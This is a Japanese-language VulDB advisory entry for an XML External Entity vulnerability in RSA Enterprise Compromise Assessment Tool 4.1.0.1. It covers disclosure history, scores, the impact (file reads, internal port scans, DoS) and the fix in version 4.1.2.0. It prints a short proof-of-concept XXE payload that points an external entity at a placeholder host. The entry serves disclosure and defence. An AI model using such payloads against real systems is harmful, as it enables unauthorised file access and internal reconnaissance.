RSA Enterprise Compromise Assessment Tool 4.1.0.1 XML External Entity
| CVSS 一時的なメタスコア | 現在のエクスプロイト価格 (≈) | CTI注目指数 |
|---|---|---|
| 4.6 | $0-$5k | 0.00 |
要約
現在、RSA Enterprise Compromise Assessment Tool 4.1.0.1にて、問題があると分類される脆弱性が確認されています。 該当するのは 不明な関数です。 未知の値で改ざんすることが、 XML External Entityを突く攻撃に繋がります}。 さらに、エクスプロイトが存在します。 対象コンポーネントのアップグレードを推奨します。
詳細
現在、RSA Enterprise Compromise Assessment Tool 4.1.0.1にて、問題があると分類される脆弱性が確認されています。 該当するのは 不明な関数です。 未知の値で改ざんすることが、 XML External Entityを突く攻撃に繋がります}。 この問題をCWEでは、CWE-611 と定義しました。 このバグは 2016年04月27日に発見されました。 この脆弱性は 2016年10月11日に Samandeep Singhより「Full-Disclosure」の Mailinglist Postにて 「SA-20161011-0」として 紹介されました。 アドバイザリはseclists.orgから入手可能です。 ベンダーとの調整の上で公開リリースが行われました。
技術的な情報は提供されていません。 この脆弱性の人気度は平均より低いです。 さらに、エクスプロイトが存在します。 エクスプロイトツールは一般に公開されており、悪用される可能性があります。 現時点では、エクスプロイトの価格は約USD $0-$5kと考えられます。 アドバイザリーは次を指摘しています。
By exploiting the XXE vulnerability, an attacker can get read access to the filesystem of the user's system using RSA ECAT client and thus obtain sensitive information from the system. It is also possible to scan ports of the internal hosts and cause DoS on the affected host.
このエクスプロイトツールは 概念実証 として宣言されています。 エクスプロイトはseclists.orgでダウンロードできます。 脆弱性は、少なくとも 167 日の間、非公開の0day攻撃ツールとして扱われました。 0-dayの際、アンダーグラウンド市場での想定価格は$25k-$100k前後でした。 エクスプロイトのソースコードは以下です:
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://[IP:port]/"; >]><foo>&xxe;</foo>
4.1.2.0にアップグレードすることで、本問題を解消できます。 対象コンポーネントのアップグレードを推奨します。 脆弱性の開示から すぐに 後に、可能な緩和策が公表されました。
製品
ベンダー
名前
バージョン
ライセンス
ウェブサイト
- ベンダー: https://www.rsa.com/
CPE 2.3
CPE 2.2
CVSSv4
VulDB ベクトル: 🔍VulDB 信頼性: 🔍
CVSSv3
VulDB ベースメタスコア: 5.3VulDB 一時的なメタスコア: 4.6
VulDB ベーススコア: 5.3
VulDB 一時的なスコア: 4.6
VulDB ベクトル: 🔍
VulDB 信頼性: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| ベクトル | 複雑さ | 認証 | 機密性 | 完全性 | 可用性 |
|---|---|---|---|---|---|
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
VulDB ベーススコア: 🔍
VulDB 一時的なスコア: 🔍
VulDB 信頼性: 🔍
悪用
クラス: XML External EntityCWE: CWE-611 / CWE-610
CAPEC: 🔍
ATT&CK: 🔍
物理的: 部分的
ローカル: はい
リモート: いいえ
可用性: 🔍
アクセス: パブリック
ステータス: 概念実証
著者: Samandeep Singh
プログラミング言語: 🔍
ダウンロード: 🔍
価格予測: 🔍
現在の価格評価: 🔍
| 0-Day | 解除 | 解除 | 解除 | 解除 |
|---|---|---|---|---|
| 本日 | 解除 | 解除 | 解除 | 解除 |
脅威インテリジェンス
関心: 🔍アクティブアクター: 🔍
アクティブなAPTグループ: 🔍
対策
推奨: アップグレードステータス: 🔍
リアクション時間: 🔍
0day日時: 🔍
暴露時間: 🔍
エクスプロイト遅延時間: 🔍
アップグレード: Enterprise Compromise Assessment Tool 4.1.2.0
タイムライン
2016年04月27日 🔍2016年04月28日 🔍
2016年10月11日 🔍
2016年10月11日 🔍
2016年10月11日 🔍
2016年10月11日 🔍
2019年05月07日 🔍
ソース
ベンダー: rsa.com勧告: SA-20161011-0
調査者: Samandeep Singh
ステータス: 未定義
調整済み: 🔍
GCVE (VulDB): GCVE-100-92523
scip Labs: https://www.scip.ch/en/?labs.20161013
エントリ
作成済み: 2016年10月11日 14:07更新済み: 2019年05月07日 16:21
変更: 2016年10月11日 14:07 (55), 2019年05月07日 16:21 (1)
完了: 🔍
Cache ID: 216::103
Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.
コメントはまだありません。 言語: ja + en.
コメントするにはログインしてください。